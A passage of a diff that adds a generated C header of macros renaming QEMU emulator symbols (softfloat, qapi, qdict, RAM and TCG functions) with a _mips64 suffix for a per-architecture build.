propagateFloat64MulAddNaN_mips64 +#define propagateFloat64NaN propagateFloat64NaN_mips64 +#define propagateFloatx80NaN propagateFloatx80NaN_mips64 +#define property_get_alias property_get_alias_mips64 +#define property_get_bool property_get_bool_mips64 +#define property_get_str property_get_str_mips64 +#define property_get_uint16_ptr property_get_uint16_ptr_mips64 +#define property_get_uint32_ptr property_get_uint32_ptr_mips64 +#define property_get_uint64_ptr property_get_uint64_ptr_mips64 +#define property_get_uint8_ptr property_get_uint8_ptr_mips64 +#define property_release_alias property_release_alias_mips64 +#define property_release_bool property_release_bool_mips64 +#define property_release_str property_release_str_mips64 +#define property_resolve_alias property_resolve_alias_mips64 +#define property_set_alias property_set_alias_mips64 +#define property_set_bool property_set_bool_mips64 +#define property_set_str property_set_str_mips64 +#define pstate_read pstate_read_mips64 +#define pstate_write pstate_write_mips64 +#define pxa250_initfn pxa250_initfn_mips64 +#define pxa255_initfn pxa255_initfn_mips64 +#define pxa260_initfn pxa260_initfn_mips64 +#define pxa261_initfn pxa261_initfn_mips64 +#define pxa262_initfn pxa262_initfn_mips64 +#define pxa270a0_initfn pxa270a0_initfn_mips64 +#define pxa270a1_initfn pxa270a1_initfn_mips64 +#define pxa270b0_initfn pxa270b0_initfn_mips64 +#define pxa270b1_initfn pxa270b1_initfn_mips64 +#define pxa270c0_initfn pxa270c0_initfn_mips64 +#define pxa270c5_initfn pxa270c5_initfn_mips64 +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_mips64 +#define qapi_dealloc_end_list qapi_dealloc_end_list_mips64 +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_mips64 +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_mips64 +#define qapi_dealloc_next_list qapi_dealloc_next_list_mips64 +#define qapi_dealloc_pop qapi_dealloc_pop_mips64 +#define qapi_dealloc_push qapi_dealloc_push_mips64 +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_mips64 +#define qapi_dealloc_start_list qapi_dealloc_start_list_mips64 +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_mips64 +#define qapi_dealloc_start_union qapi_dealloc_start_union_mips64 +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_mips64 +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_mips64 +#define qapi_dealloc_type_int qapi_dealloc_type_int_mips64 +#define qapi_dealloc_type_number qapi_dealloc_type_number_mips64 +#define qapi_dealloc_type_size qapi_dealloc_type_size_mips64 +#define qapi_dealloc_type_str qapi_dealloc_type_str_mips64 +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_mips64 +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_mips64 +#define qapi_free_boolList qapi_free_boolList_mips64 +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_mips64 +#define qapi_free_int16List qapi_free_int16List_mips64 +#define qapi_free_int32List qapi_free_int32List_mips64 +#define qapi_free_int64List qapi_free_int64List_mips64 +#define qapi_free_int8List qapi_free_int8List_mips64 +#define qapi_free_intList qapi_free_intList_mips64 +#define qapi_free_numberList qapi_free_numberList_mips64 +#define qapi_free_strList qapi_free_strList_mips64 +#define qapi_free_uint16List qapi_free_uint16List_mips64 +#define qapi_free_uint32List qapi_free_uint32List_mips64 +#define qapi_free_uint64List qapi_free_uint64List_mips64 +#define qapi_free_uint8List qapi_free_uint8List_mips64 +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_mips64 +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_mips64 +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_mips64 +#define qbool_destroy_obj qbool_destroy_obj_mips64 +#define qbool_from_int qbool_from_int_mips64 +#define qbool_get_int qbool_get_int_mips64 +#define qbool_type qbool_type_mips64 +#define qbus_create qbus_create_mips64 +#define qbus_create_inplace qbus_create_inplace_mips64 +#define qbus_finalize qbus_finalize_mips64 +#define qbus_initfn qbus_initfn_mips64 +#define qbus_realize qbus_realize_mips64 +#define qdev_create qdev_create_mips64 +#define qdev_get_type qdev_get_type_mips64 +#define qdev_register_types qdev_register_types_mips64 +#define qdev_set_parent_bus qdev_set_parent_bus_mips64 +#define qdev_try_create qdev_try_create_mips64 +#define qdict_add_key qdict_add_key_mips64 +#define qdict_array_split qdict_array_split_mips64 +#define qdict_clone_shallow qdict_clone_shallow_mips64 +#define qdict_del qdict_del_mips64 +#define qdict_destroy_obj qdict_destroy_obj_mips64 +#define qdict_entry_key qdict_entry_key_mips64 +#define qdict_entry_value qdict_entry_value_mips64 +#define qdict_extract_subqdict qdict_extract_subqdict_mips64 +#define qdict_find qdict_find_mips64 +#define qdict_first qdict_first_mips64 +#define qdict_flatten qdict_flatten_mips64 +#define qdict_flatten_qdict qdict_flatten_qdict_mips64 +#define qdict_flatten_qlist qdict_flatten_qlist_mips64 +#define qdict_get qdict_get_mips64 +#define qdict_get_bool qdict_get_bool_mips64 +#define qdict_get_double qdict_get_double_mips64 +#define qdict_get_int qdict_get_int_mips64 +#define qdict_get_obj qdict_get_obj_mips64 +#define qdict_get_qdict qdict_get_qdict_mips64 +#define qdict_get_qlist qdict_get_qlist_mips64 +#define qdict_get_str qdict_get_str_mips64 +#define qdict_get_try_bool qdict_get_try_bool_mips64 +#define qdict_get_try_int qdict_get_try_int_mips64 +#define qdict_get_try_str qdict_get_try_str_mips64 +#define qdict_haskey qdict_haskey_mips64 +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_mips64 +#define qdict_iter qdict_iter_mips64 +#define qdict_join qdict_join_mips64 +#define qdict_new qdict_new_mips64 +#define qdict_next qdict_next_mips64 +#define qdict_next_entry qdict_next_entry_mips64 +#define qdict_put_obj qdict_put_obj_mips64 +#define qdict_size qdict_size_mips64 +#define qdict_type qdict_type_mips64 +#define qemu_clock_get_us qemu_clock_get_us_mips64 +#define qemu_clock_ptr qemu_clock_ptr_mips64 +#define qemu_clocks qemu_clocks_mips64 +#define qemu_get_cpu qemu_get_cpu_mips64 +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_mips64 +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_mips64 +#define qemu_get_ram_block qemu_get_ram_block_mips64 +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_mips64 +#define qemu_get_ram_fd qemu_get_ram_fd_mips64 +#define qemu_get_ram_ptr qemu_get_ram_ptr_mips64 +#define qemu_host_page_mask qemu_host_page_mask_mips64 +#define qemu_host_page_size qemu_host_page_size_mips64 +#define qemu_init_vcpu qemu_init_vcpu_mips64 +#define qemu_ld_helpers qemu_ld_helpers_mips64 +#define qemu_log_close qemu_log_close_mips64 +#define qemu_log_enabled qemu_log_enabled_mips64 +#define qemu_log_flush qemu_log_flush_mips64 +#define qemu_loglevel_mask qemu_loglevel_mask_mips64 +#define qemu_log_vprintf qemu_log_vprintf_mips64 +#define qemu_oom_check qemu_oom_check_mips64 +#define qemu_parse_fd qemu_parse_fd_mips64 +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_mips64 +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_mips64 +#define qemu_ram_alloc qemu_ram_alloc_mips64 +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_mips64 +#define qemu_ram_foreach_block qemu_ram_foreach_block_mips64 +#define qemu_ram_free qemu_ram_free_mips64 +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_mips64 +#define qemu_ram_ptr_length qemu_ram_ptr_length_mips64 +#define qemu_ram_remap qemu_ram_remap_mips64 +#define qemu_ram_setup_dump qemu_ram_setup_dump_mips64 +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_mips64 +#define qemu_real_host_page_size qemu_real_host_page_size_mips64 +#define qemu_st_helpers qemu_st_helpers_mips64 +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_mips64 +#define qemu_try_memalign qemu_try_memalign_mips64 +#define qentry_destroy qentry_destroy_mips64 +#define qerror_human qerror_human_mips64 +#define qerror_report qerror_report_mips64 +#define qerror_report_err qerror_report_err_mips64 +#define qfloat_destroy_obj qfloat_destroy_obj_mips64 +#define qfloat_from_double qfloat_from_double_mips64 +#define qfloat_get_double qfloat_get_double_mips64 +#define qfloat_type qfloat_type_mips64 +#define qint_destroy_obj qint_destroy_obj_mips64 +#define qint_from_int qint_from_int_mips64 +#define qint_get_int qint_get_int_mips64 +#define qint_type qint_type_mips64 +#define qlist_append_obj qlist_append_obj_mips64 +#define qlist_copy qlist_copy_mips64 +#define qlist_copy_elem qlist_copy_elem_mips64 +#define qlist_destroy_obj qlist_destroy_obj_mips64 +#define qlist_empty qlist_empty_mips64 +#define qlist_entry_obj qlist_entry_obj_mips64 +#define qlist_first qlist_first_mips64 +#define qlist_iter qlist_iter_mips64 +#define qlist_new qlist_new_mips64 +#define qlist_next qlist_next_mips64 +#define qlist_peek qlist_peek_mips64 +#define qlist_pop qlist_pop_mips64 +#define qlist_size qlist_size_mips64 +#define qlist_size_iter qlist_size_iter_mips64 +#define qlist_type qlist_type_mips64 +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_mips64 +#define qmp_input_end_list qmp_input_end_list_mips64 +#define qmp_input_end_struct qmp_input_end_struct_mips64 +#define qmp_input_get_next_type qmp_input_get_next_type_mips64 +#define qmp_input_get_object qmp_input_get_object_mips64 +#define qmp_input_get_visitor qmp_input_get_visitor_mips64 +#define qmp_input_next_list qmp_input_next_list_mips64 +#define qmp_input_optional qmp_input_optional_mips64 +#define qmp_input_pop qmp_input_pop_mips64 +#define qmp_input_push qmp_input_push_mips64 +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_mips64 +#define qmp_input_start_list qmp_input_start_list_mips64 +#define qmp_input_start_struct qmp_input_start_struct_mips64 +#define qmp_input_type_bool qmp_input_type_bool_mips64 +#define qmp_input_type_int qmp_input_type_int_mips64 +#define qmp_input_type_number qmp_input_type_number_mips64 +#define qmp_input_type_str qmp_input_type_str_mips64 +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_mips64 +#define qmp_input_visitor_new qmp_input_visitor_new_mips64 +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_mips64 +#define qmp_output_add_obj qmp_output_add_obj_mips64 +#define qmp_output_end_list qmp_output_end_list_mips64 +#define qmp_output_end_struct qmp_output_end_struct_mips64 +#define qmp_output_first qmp_output_first_mips64 +#define qmp_output_get_qobject qmp_output_get_qobject_mips64 +#define qmp_output_get_visitor qmp_output_get_visitor_mips64 +#define qmp_output_last qmp_output_last_mips64 +#define qmp_output_next_list qmp_output_next_list_mips64 +#define qmp_output_pop qmp_output_pop_mips64 +#define qmp_output_push_obj qmp_output_push_obj_mips64 +#define qmp_output_start_list qmp_output_start_list_mips64 +#define qmp_output_start_struct qmp_output_start_struct_mips64 +#define qmp_output_type_bool qmp_output_type_bool_mips64 +#define qmp_output_type_int qmp_output_type_int_mips64 +#define qmp_output_type_number qmp_output_type_number_mips64 +#define qmp_output_type_str qmp_output_type_str_mips64 +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_mips64 +#define qmp_output_visitor_new qmp_output_visitor_new_mips64 +#define qobject_decref qobject_decref_mips64 +#define qobject_to_qbool qobject_to_qbool_mips64 +#define qobject_to_qdict qobject_to_qdict_mips64 +#define qobject_to_qfloat qobject_to_qfloat_mips64 +#define qobject_to_qint qobject_to_qint_mips64 +#define qobject_to_qlist qobject_to_qlist_mips64 +#define qobject_to_qstring qobject_to_qstring_mips64 +#define qobject_type qobject_type_mips64 +#define qstring_append qstring_append_mips64 +#define qstring_append_chr qstring_append_chr_mips64 +#define qstring_append_int qstring_append_int_mips64 +#define qstring_destroy_obj qstring_destroy_obj_mips64 +#define qstring_from_escaped_str qstring_from_escaped_str_mips64 +#define qstring_from_str qstring_from_str_mips64 +#define qstring_from_substr qstring_from_substr_mips64 +#define qstring_get_length qstring_get_length_mips64 +#define qstring_get_str qstring_get_str_mips64 +#define qstring_new qstring_new_mips64 +#define qstring_type qstring_type_mips64 +#define ram_block_add ram_block_add_mips64 +#define ram_size ram_size_mips64 +#define range_compare range_compare_mips64 +#define range_covers_byte range_covers_byte_mips64 +#define range_get_last range_get_last_mips64 +#define range_merge range_merge_mips64 +#define ranges_can_merge ranges_can_merge_mips64 +#define raw_read raw_read_mips64 +#define raw_write raw_write_mips64 +#define rcon rcon_mips64 +#define read_raw_cp_reg read_raw_cp_reg_mips64 +#define recip_estimate recip_estimate_mips64 +#define recip_sqrt_estimate recip_sqrt_estimate_mips64 +#define register_cp_regs_for_features register_cp_regs_for_features_mips64 +#define register_multipage register_multipage_mips64 +#define register_subpage register_subpage_mips64 +#define register_tm_clones register_tm_clones_mips64 +#define register_types_object register_types_object_mips64 +#define regnames regnames_mips64 +#define render_memory_region render_memory_region_mips64 +#define reset_all_temps reset_all_temps_mips64 +#define reset_temp reset_temp_mips64 +#define rol32 rol32_mips64 +#define rol64 rol64_mips64 +#define ror32 ror32_mips64 +#define ror64 ror64_mips64 +#define roundAndPackFloat128 roundAndPackFloat128_mips64 +#define roundAndPackFloat16 roundAndPackFloat16_mips64 +#define roundAndPackFloat32 roundAndPackFloat32_mips64 +#define roundAndPackFloat64 roundAndPackFloat64_mips64 +#define roundAndPackFloatx80 roundAndPackFloatx80_mips64 +#define roundAndPackInt32 roundAndPackInt32_mips64 +#define roundAndPackInt64 roundAndPackInt64_mips64 +#define roundAndPackUint64 roundAndPackUint64_mips64 +#define round_to_inf round_to_inf_mips64 +#define run_on_cpu run_on_cpu_mips64 +#define s0 s0_mips64 +#define S0 S0_mips64 +#define s1 s1_mips64 +#define S1 S1_mips64 +#define sa1100_initfn sa1100_initfn_mips64 +#define sa1110_initfn sa1110_initfn_mips64 +#define save_globals save_globals_mips64 +#define scr_write scr_write_mips64 +#define sctlr_write sctlr_write_mips64 +#define set_bit set_bit_mips64 +#define set_bits set_bits_mips64 +#define set_default_nan_mode set_default_nan_mode_mips64 +#define set_feature set_feature_mips64 +#define set_float_detect_tininess set_float_detect_tininess_mips64 +#define set_float_exception_flags set_float_exception_flags_mips64 +#define set_float_rounding_mode set_float_rounding_mode_mips64 +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_mips64 +#define set_flush_to_zero set_flush_to_zero_mips64 +#define set_swi_errno set_swi_errno_mips64 +#define sextract32 sextract32_mips64 +#define sextract64 sextract64_mips64 +#define shift128ExtraRightJamming shift128ExtraRightJamming_mips64 +#define shift128Right shift128Right_mips64 +#define shift128RightJamming shift128RightJamming_mips64 +#define shift32RightJamming shift32RightJamming_mips64 +#define shift64ExtraRightJamming shift64ExtraRightJamming_mips64 +#define shift64RightJamming shift64RightJamming_mips64 +#define shifter_out_im shifter_out_im_mips64 +#define shortShift128Left shortShift128Left_mips64 +#define shortShift192Left shortShift192Left_mips64 +#define simple_mpu_ap_bits simple_mpu_ap_bits_mips64 +#define size_code_gen_buffer size_code_gen_buffer_mips64 +#define softmmu_lock_user softmmu_lock_user_mips64 +#define softmmu_lock_user_string softmmu_lock_user_string_mips64 +#define softmmu_tget32 softmmu_tget32_mips64 +#define softmmu_tget8 softmmu_tget8_mips64 +#define softmmu_tput32 softmmu_tput32_mips64 +#define softmmu_unlock_user softmmu_unlock_user_mips64 +#define sort_constraints sort_constraints_mips64 +#define sp_el0_access sp_el0_access_mips64 +#define spsel_read spsel_read_mips64 +#define spsel_write spsel_write_mips64 +#define start_list start_list_mips64 +#define stb_p stb_p_mips64 +#define stb_phys stb_phys_mips64 +#define stl_be_p stl_be_p_mips64 +#define stl_be_phys stl_be_phys_mips64 +#define stl_he_p stl_he_p_mips64 +#define stl_le_p stl_le_p_mips64 +#define stl_le_phys stl_le_phys_mips64 +#define stl_phys stl_phys_mips64 +#define stl_phys_internal stl_phys_internal_mips64 +#define stl_phys_notdirty stl_phys_notdirty_mips64 +#define store_cpu_offset store_cpu_offset_mips64 +#define store_reg store_reg_mips64 +#define store_reg_bx store_reg_bx_mips64 +#define store_reg_from_load store_reg_from_load_mips64 +#define stq_be_p stq_be_p_mips64 +#define stq_be_phys stq_be_phys_mips64 +#define stq_he_p stq_he_p_mips64 +#define stq_le_p stq_le_p_mips64 +#define stq_le_phys stq_le_phys_mips64 +#define stq_phys stq_phys_mips64 +#define string_input_get_visitor string_input_get_visitor_mips64 +#define string_input_visitor_cleanup string_input_visitor_cleanup_mips64 +#define string_input_visitor_new string_input_visitor_new_mips64 +#define strongarm_cp_reginfo strongarm_cp_reginfo_mips64 +#define strstart strstart_mips64 +#define strtosz strtosz_mips64 +#define strtosz_suffix strtosz_suffix_mips64 +#define stw_be_p stw_be_p_mips64 +#define stw_be_phys stw_be_phys_mips64 +#define stw_he_p stw_he_p_mips64 +#define stw_le_p stw_le_p_mips64 +#define stw_le_phys stw_le_phys_mips64 +#define stw_phys stw_phys_mips64 +#define stw_phys_internal stw_phys_internal_mips64 +#define sub128 sub128_mips64 +#define sub16_sat sub16_sat_mips64 +#define sub16_usat sub16_usat_mips64 +#define sub192 sub192_mips64 +#define sub8_sat sub8_sat_mips64 +#define sub8_usat sub8_usat_mips64 +#define subFloat128Sigs subFloat128Sigs_mips64 +#define subFloat32Sigs subFloat32Sigs_mips64 +#define subFloat64Sigs subFloat64Sigs_mips64 +#define subFloatx80Sigs subFloatx80Sigs_mips64 +#define subpage_accepts subpage_accepts_mips64 +#define subpage_init subpage_init_mips64 +#define subpage_ops subpage_ops_mips64 +#define subpage_read subpage_read_mips64 +#define subpage_register subpage_register_mips64 +#define subpage_write subpage_write_mips64 +#define suffix_mul suffix_mul_mips64 +#define swap_commutative swap_commutative_mips64 +#define swap_commutative2 swap_commutative2_mips64 +#define switch_mode switch_mode_mips64 +#define switch_v7m_sp switch_v7m_sp_mips64 +#define syn_aa32_bkpt syn_aa32_bkpt_mips64 +#define syn_aa32_hvc syn_aa32_hvc_mips64 +#define syn_aa32_smc syn_aa32_smc_mips64 +#define syn_aa32_svc syn_aa32_svc_mips64 +#define syn_breakpoint syn_breakpoint_mips64 +#define sync_globals sync_globals_mips64 +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_mips64 +#define syn_cp14_rt_trap syn_cp14_rt_trap_mips64 +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_mips64 +#define syn_cp15_rt_trap syn_cp15_rt_trap_mips64 +#define syn_data_abort syn_data_abort_mips64 +#define syn_fp_access_trap syn_fp_access_trap_mips64 +#define syn_insn_abort syn_insn_abort_mips64 +#define syn_swstep syn_swstep_mips64 +#define syn_uncategorized syn_uncategorized_mips64 +#define syn_watchpoint syn_watchpoint_mips64 +#define syscall_err syscall_err_mips64 +#define system_bus_class_init system_bus_class_init_mips64 +#define system_bus_info system_bus_info_mips64 +#define t2ee_cp_reginfo t2ee_cp_reginfo_mips64 +#define table_logic_cc table_logic_cc_mips64 +#define target_parse_constraint target_parse_constraint_mips64 +#define target_words_bigendian target_words_bigendian_mips64 +#define tb_add_jump tb_add_jump_mips64 +#define tb_alloc tb_alloc_mips64 +#define tb_alloc_page tb_alloc_page_mips64 +#define tb_check_watchpoint tb_check_watchpoint_mips64 +#define tb_find_fast tb_find_fast_mips64 +#define tb_find_pc tb_find_pc_mips64 +#define tb_find_slow tb_find_slow_mips64 +#define tb_flush tb_flush_mips64 +#define tb_flush_jmp_cache tb_flush_jmp_cache_mips64 +#define tb_free tb_free_mips64 +#define tb_gen_code tb_gen_code_mips64 +#define tb_hash_remove tb_hash_remove_mips64 +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_mips64 +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_mips64 +#define tb_invalidate_phys_range tb_invalidate_phys_range_mips64 +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_mips64 +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_mips64 +#define tb_jmp_remove tb_jmp_remove_mips64 +#define tb_link_page tb_link_page_mips64 +#define tb_page_remove tb_page_remove_mips64 +#define tb_phys_hash_func tb_phys_hash_func_mips64 +#define tb_phys_invalidate tb_phys_invalidate_mips64 +#define tb_reset_jump tb_reset_jump_mips64 +#define tb_set_jmp_target tb_set_jmp_target_mips64 +#define tcg_accel_class_init tcg_accel_class_init_mips64 +#define tcg_accel_type tcg_accel_type_mips64 +#define tcg_add_param_i32 tcg_add_param_i32_mips64 +#define tcg_add_param_i64 tcg_add_param_i64_mips64 +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_mips64 +#define tcg_allowed tcg_allowed_mips64 +#define tcg_canonicalize_memop tcg_canonicalize_memop_mips64 +#define tcg_commit tcg_commit_mips64 +#define tcg_cond_to_jcc tcg_cond_to_jcc_mips64 +#define tcg_constant_folding tcg_constant_folding_mips64 +#define tcg_const_i32 tcg_const_i32_mips64 +#define tcg_const_i64 tcg_const_i64_mips64 +#define tcg_const_local_i32 tcg_const_local_i32_mips64 +#define tcg_const_local_i64 tcg_const_local_i64_mips64 +#define tcg_context_init tcg_context_init_mips64 +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_mips64 +#define tcg_cpu_exec tcg_cpu_exec_mips64 +#define tcg_current_code_size tcg_current_code_size_mips64 +#define tcg_dump_info tcg_dump_info_mips64 +#define tcg_dump_ops tcg_dump_ops_mips64 +#define tcg_exec_all tcg_exec_all_mips64 +#define tcg_find_helper tcg_find_helper_mips64 +#define tcg_func_start tcg_func_start_mips64 +#define tcg_gen_abs_i32 tcg_gen_abs_i32_mips64 +#define tcg_gen_add2_i32 tcg_gen_add2_i32_mips64 +#define tcg_gen_add_i32 tcg_gen_add_i32_mips64 +#define tcg_gen_add_i64 tcg_gen_add_i64_mips64 +#define tcg_gen_addi_i32 tcg_gen_addi_i32_mips64 +#define tcg_gen_addi_i64 tcg_gen_addi_i64_mips64 +#define tcg_gen_andc_i32 tcg_gen_andc_i32_mips64 +#define tcg_gen_and_i32 tcg_gen_and_i32_mips64 +#define tcg_gen_and_i64 tcg_gen_and_i64_mips64 +#define tcg_gen_andi_i32 tcg_gen_andi_i32_mips64 +#define tcg_gen_andi_i64 tcg_gen_andi_i64_mips64 +#define tcg_gen_br tcg_gen_br_mips64 +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_mips64 +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_mips64 +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_mips64 +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_mips64 +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_mips64 +#define tcg_gen_callN tcg_gen_callN_mips64 +#define tcg_gen_code tcg_gen_code_mips64 +#define tcg_gen_code_common tcg_gen_code_common_mips64 +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_mips64 +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_mips64 +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_mips64 +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_mips64 +#define tcg_gen_exit_tb tcg_gen_exit_tb_mips64 +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_mips64 +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_mips64 +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_mips64 +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_mips64 +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_mips64 +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_mips64 +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_mips64 +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_mips64 +#define tcg_gen_goto_tb tcg_gen_goto_tb_mips64 +#define tcg_gen_ld_i32 tcg_gen_ld_i32_mips64 +#define tcg_gen_ld_i64 tcg_gen_ld_i64_mips64 +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_mips64 +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_mips64 +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_mips64 +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_mips64 +#define tcg_gen_mov_i32 tcg_gen_mov_i32_mips64 +#define tcg_gen_mov_i64 tcg_gen_mov_i64_mips64 +#define tcg_gen_movi_i32 tcg_gen_movi_i32_mips64 +#define tcg_gen_movi_i64 tcg_gen_movi_i64_mips64 +#define tcg_gen_mul_i32 tcg_gen_mul_i32_mips64 +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_mips64 +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_mips64 +#define tcg_gen_neg_i32 tcg_gen_neg_i32_mips64 +#define tcg_gen_neg_i64 tcg_gen_neg_i64_mips64 +#define tcg_gen_not_i32 tcg_gen_not_i32_mips64 +#define tcg_gen_op0 tcg_gen_op0_mips64 +#define tcg_gen_op1i tcg_gen_op1i_mips64 +#define tcg_gen_op2_i32 tcg_gen_op2_i32_mips64 +#define tcg_gen_op2_i64 tcg_gen_op2_i64_mips64 +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_mips64 +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_mips64 +#define tcg_gen_op3_i32 tcg_gen_op3_i32_mips64 +#define tcg_gen_op3_i64 tcg_gen_op3_i64_mips64 +#define tcg_gen_op4_i32 tcg_gen_op4_i32_mips64 +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_mips64 +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_mips64 +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_mips64 +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_mips64 +#define tcg_gen_op6_i32 tcg_gen_op6_i32_mips64 +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_mips64 +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_mips64 +#define tcg_gen_orc_i32 tcg_gen_orc_i32_mips64 +#define tcg_gen_or_i32 tcg_gen_or_i32_mips64 +#define tcg_gen_or_i64 tcg_gen_or_i64_mips64 +#define tcg_gen_ori_i32 tcg_gen_ori_i32_mips64 +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_mips64 +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_mips64 +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_mips64 +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_mips64 +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_mips64 +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_mips64 +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_mips64 +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_mips64 +#define tcg_gen_sar_i32 tcg_gen_sar_i32_mips64 +#define tcg_gen_sari_i32 tcg_gen_sari_i32_mips64 +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_mips64 +#define tcg_gen_shl_i32 tcg_gen_shl_i32_mips64 +#define tcg_gen_shl_i64 tcg_gen_shl_i64_mips64 +#define tcg_gen_shli_i32 tcg_gen_shli_i32_mips64 +#define tcg_gen_shli_i64 tcg_gen_shli_i64_mips64 +#define tcg_gen_shr_i32 tcg_gen_shr_i32_mips64 +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_mips64 +#define tcg_gen_shr_i64 tcg_gen_shr_i64_mips64 +#define tcg_gen_shri_i32 tcg_gen_shri_i32_mips64 +#define tcg_gen_shri_i64 tcg_gen_shri_i64_mips64 +#define tcg_gen_st_i32 tcg_gen_st_i32_mips64 +#define tcg_gen_st_i64 tcg_gen_st_i64_mips64 +#define tcg_gen_sub_i32 tcg_gen_sub_i32_mips64 +#define tcg_gen_sub_i64 tcg_gen_sub_i64_mips64 +#define tcg_gen_subi_i32 tcg_gen_subi_i32_mips64 +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_mips64 +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_mips64 +#define tcg_gen_xor_i32 tcg_gen_xor_i32_mips64 +#define tcg_gen_xor_i64 tcg_gen_xor_i64_mips64 +#define tcg_gen_xori_i32 tcg_gen_xori_i32_mips64 +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_mips64 +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_mips64 +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_mips64 +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_mips64 +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_mips64 +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_mips64 +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_mips64 +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_mips64 +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_mips64 +#define tcg_handle_interrupt tcg_handle_interrupt_mips64 +#define tcg_init tcg_init_mips64 +#define tcg_invert_cond tcg_invert_cond_mips64 +#define tcg_la_bb_end tcg_la_bb_end_mips64 +#define tcg_la_br_end tcg_la_br_end_mips64 +#define tcg_la_func_end tcg_la_func_end_mips64 +#define tcg_liveness_analysis tcg_liveness_analysis_mips64 +#define tcg_malloc tcg_malloc_mips64 +#define tcg_malloc_internal tcg_malloc_internal_mips64 +#define tcg_op_defs_org tcg_op_defs_org_mips64 +#define tcg_opt_gen_mov tcg_opt_gen_mov_mips64 +#define tcg_opt_gen_movi tcg_opt_gen_movi_mips64 +#define tcg_optimize tcg_optimize_mips64 +#define tcg_out16 tcg_out16_mips64 +#define tcg_out32 tcg_out32_mips64 +#define tcg_out64 tcg_out64_mips64 +#define tcg_out8 tcg_out8_mips64 +#define 